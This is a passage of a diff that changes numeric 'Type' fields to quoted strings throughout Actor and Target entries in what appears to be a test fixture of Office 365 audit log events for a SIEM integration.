- "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -964,27 +964,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1062,27 +1062,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1168,27 +1168,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1266,27 +1266,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1372,27 +1372,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1470,27 +1470,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1576,27 +1576,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1674,27 +1674,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1780,27 +1780,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1878,27 +1878,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1984,27 +1984,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2082,27 +2082,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2188,27 +2188,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2286,27 +2286,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2392,27 +2392,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2490,27 +2490,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2596,27 +2596,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2694,27 +2694,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2800,27 +2800,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2898,27 +2898,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3004,27 +3004,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3102,27 +3102,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3208,27 +3208,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3306,27 +3306,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3412,27 +3412,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3510,27 +3510,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3616,27 +3616,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3700,19 +3700,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3798,27 +3798,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3882,19 +3882,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3980,27 +3980,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4065,27 +4065,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4171,27 +4171,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4255,19 +4255,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4353,27 +4353,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4437,19 +4437,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4535,27 +4535,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4619,19 +4619,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4717,27 +4717,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4802,27 +4802,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4908,27 +4908,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5006,27 +5006,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5112,27 +5112,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5210,27 +5210,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5316,27 +5316,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], 